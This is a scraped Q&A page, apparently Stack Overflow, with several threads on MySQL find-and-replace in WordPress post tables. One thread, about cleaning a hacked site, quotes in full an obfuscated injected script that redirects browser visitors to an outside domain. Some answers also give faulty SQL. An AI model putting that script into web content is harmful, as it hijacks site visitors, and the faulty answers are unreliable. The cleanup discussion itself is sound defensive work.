SQL search and replace advanced - sql

Usually when I search and replace I use this code:
UPDATE wp_posts SET post_content = REPLACE (post_content, 'old string', 'new string');
Now I'd like to replace <h1>Title</h1>with <table>...<h1>Title</h1>...</table>
Problem is of course that the text in between tags is different for all pages (it is a wordpress homepage).
Any ideas on how to solve this? Is it possible?

try this its update your column and add text to all of your record
UPDATE wp_posts SET post_content = `<table>`+ post_content+`</table>` ;

If all you need is to put the <table>...</table> tags at the beginning and end, then use Anant Dabhi's solution. However, if you need to do anything smarter than that, SQL is really not the right tool for the job.
The problems with simplistic processing of HTML are many:
What if the tag you are looking for exists within a comment?
What if the <h1> tag has attributes inside it?
What if there is more than one <h1>...</h1> within a post?
The potential problems go on and on.
Since you are using WordPress, why not use PHP, which gives you access to real HTML parsers?
This discussion can get you started:
How do you parse and process HTML/XML in PHP?

this two update statement can help you to do
UPDATE wp_posts
SET post_content = REPLACE (post_content, '<h1>', '<table><h1>');
UPDATE wp_posts
SET post_content = REPLACE (post_content, '</h1>', '</table></h1>');

Related

Replace value in multiple strings without charindex

so This is a sample of my DB Values
UPDATE page p SET p.content = REPLACE(p.content, SUBSTRING(p.content, CHARINDEX('php?id=', p.content) +1), CONCAT('php?id=',p.course)) WHERE p.content LIKE '%php?id=%' AND p.content NOT LIKE CONCAT('%','php?id=',p.course,'%');
I'm Trying to only get the text after php?id= which is a number and change it to the correct number which is the course column
so for example the first value should be changed to
4|Enjoy your training!<a href="*/view.php?id=4">
Unfortunately charindex keeps giving me an Error
Any Help on how to Make this thing work without charindex as i Believe our server does not support this function
UPDATE: Charindex didnt exist in mysql so i had to use LOCATE fuction instead. Also i wasnt using the root password for the whole server, just the root password for the db
Thanks for the heads up!
Now just need the query to correctly update... as it removes just everything after <a href etc etc and doesnt replace

Remove script injected into wordpress database

My website got hacked and is now redirecting all new visitors to a shitty website.
I changed all passwords I can think of, installed Wordfence (I'm on wordpress), removed all malicious code from files.
Now I am left with close to 5000 posts in wp_posts table that still contain the same malicious code.
Namely this:
<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>
I tried
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https://www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\x20path=/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](/Android/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/BlackBerry/i)||navigator['userAgent'][_0x287a('0xd')](/iPhone|iPad|iPod/i)||navigator[_0x287a('0xe')]['match'](/Opera Mini/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](/IEMobile/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};</script>", " ")
But I get #1064 - Something is wrong in your syntax near'"<script>var _0x2cf4=['MSIE)' in line 1
Thanks for any help.
Thanks to #B. Go I came up with:
UPDATE wp_posts
SET
post_content = REGEXP_REPLACE(post_content,"<script>var _0x2cf4=.*</script>"," ")
WHERE
post_content RLIKE "<script>var _0x2cf4=.*</script>"
Still can't rid of malicious code on one page, but it doesn't seem to be in the DB.
if the malicious code exist in every post, you might need to check your head and footer file which appear in every post and also core js files that could contain malicious code.
Also check if any external js being called when loading page.
If you can ssh to your file, you can grep -nr "var _0x2cf4=" to target the files.
Hope it helps, thanks
Please, read this answer from one good guy:
https://wordpress.stackexchange.com/questions/357465/removing-malware-appended-to-each-post/358141#358141
Hope this helps
Using REGXP function in mysql
UPDATE wp_posts SET post_content = REGEXP_REPLACE(post_content,'<script type="text/javascript">.*</script>'," ") WHERE post_content REGEXP('<script type="text/javascript">.*</script>')

MySQL: How can I remove trailing HTML from a field in the database?

I want to remove some rogue HTML from a DB field that is supposed to contain a simple filename. Example of ok field:
myfile.pdf
Example of not ok field:
myfile2.pdf<input type="hidden" id="gwProxy" />...
Does anyone know a query I can run that can remove the HTML part but leave the filename? i.e. remove everything from the first < character onwards.
Lets assume the field is called myattachment and is defined as a varchar(250) and the table is called mytable in a MySQL database.
Background info (not necessary to read):
The field in our database is supposed to contain filenames however, due to a issue (documented here) some of the fields now contain a filename and some rogue HTML. We have fixed the root issue and now need to fix the corrupt fields. In the past I have replaced text using this kind of query:
UPDATE mytable SET myattachment = replace(myattachment, 'JPG', 'jpg') WHERE myattachment LIKE '%JPG';
This query seems to work ok, can anyone see any issues with it?
UPDATE mytable
SET myattachment = SUBSTRING_INDEX(myattachment, '<', 1)
WHERE `myattachment` LIKE '%<%';
For docs on SUBSTRING_INDEX see the mysql manual page.

Need to add LF to thousands of MySQL MEDIUMTEXT fields

I need to add a \n or LF or ASCII(x'0A') or however you want to encode it to the end of several thousand MySQL MEDIUMTEXT fields. I tried
update wp_posts set post_content = concat(post_content,ASCII(x'0A'));
but nothing is modified in the field as far as I can see. I suspect this is a limitation of MEDIUMTEXT/LONGTEXT fields, but it would be nice if MySQL would throw an error instead of saying it did something and doing nothing.
If I can't do it with update/concat, what other options do I have? Does someone have a chunk of php code I can use to do it in a loop?
Thanks for any input! I'm trying to get my wordpress site to validate with W3C, and I need the newlines so wordpress does not add a <p> tag inappropriately. Strange, I know.
I don't know where my brain was. I was using HeidiSQL as the interface to MySQL, and wasn't seeing the change in the database. But it did change, which I saw once I refreshed the table data. Sorry for the false question!
Try:
update wp_posts set post_content = concat(post_content,'\n');
I tested with a mediumtext field here and worked..

MySQL: Replace substring if string ends in jpg, gif or png

I'm doing a favor for a friend, getting him off of Blogger and onto a hosted WordPress blog.
The big problem is, with over 1,800 posts, there are a lot of image links to deal with. WordPress has no mechanism to import these automatically, so I'm doing it manually.
I've used wget to download every single image that has ever been linked/embedded on the site. Now I need some help building a MySQL query to change all of the images in the blog to their new address.
For example:
http://www.externaldomain.com/some/link/to/an/image.jpg
Ought to become:
http://www.newbloghosting.com/wordpress/wp-content/uploads/legacy/www.externaldomain.com/some/link/to/an/image.jpg
So the condition is, if a string in post_content ends in jpeg, jpg, gif or png, replace:
http://
with
http://www.newbloghosting.com/wordpress/wp-content/uploads/legacy/
I know how to do a blanket replace with
UPDATE wp_posts SET post_content = replace(post_content, 'http://www.old-domain.com', 'http://www.new-domain.com');
But I'm having a hard time figuring out how to accomplish my more nuanced, conditional approach.
Thanks for any guidance you can offer. (Torn between posting here or ServerFault but SO looks like it has plenty of MySQL gurus, so here I am.)
MySQL has a great selection of string manipulation functions that you can plug into your query's WHERE section.
UPDATE wp_posts
SET post_content = REPLACE(post_content, 'http://www.old-domain.com', 'http://www.new-domain.com')
WHERE RIGHT(post_content, 4) = 'jpeg'
OR RIGHT(post_content, 3) IN ('jpg', 'gif', 'png');
If it were me, though, I'd do two additional things: convert it to lowercase to match e.g. '.JPG', and match the dot before jpg, gif, etc.:
WHERE LOWER(RIGHT(post_content, 5)) = '.jpeg'
OR LOWER(RIGHT(post_content, 4)) IN ('.jpg', '.gif', '.png');
REPLACE will only perform an alteration if the old substring is found - I don't see the concern.
REPLACE(post_content, 'http://www.old-domain.com', 'http://www.new-domain.com');
...will work. If you want to limit the updates to rows containing "jpeg", "jpg", "gif" and/or "png", add:
WHERE INSTR(post_content, 'jpeg') > 0
OR INSTR(post_content, 'jpg') > 0
OR INSTR(post_content, 'gif') > 0
OR INSTR(post_content, 'png') > 0
References:
REPLACE
INSTR
If everything fails, what about using the import feature? Then use a plugin to get your images as well (check for the comments in the plugin post since there are some relevant information).
I don't think it can be done in a simple query, but it's relatively easy to do with a simple php script. just have a simple loop in php to go over every single row with content and do a preg_replace on the content field, then update that single row.
It's not nearly as elegant as doing it in sql, but its sure to get the job done today as oposed to sometime this year.
P.S. this is assuming there is more content than just the URL, in which case normal mysql string functions would suffice.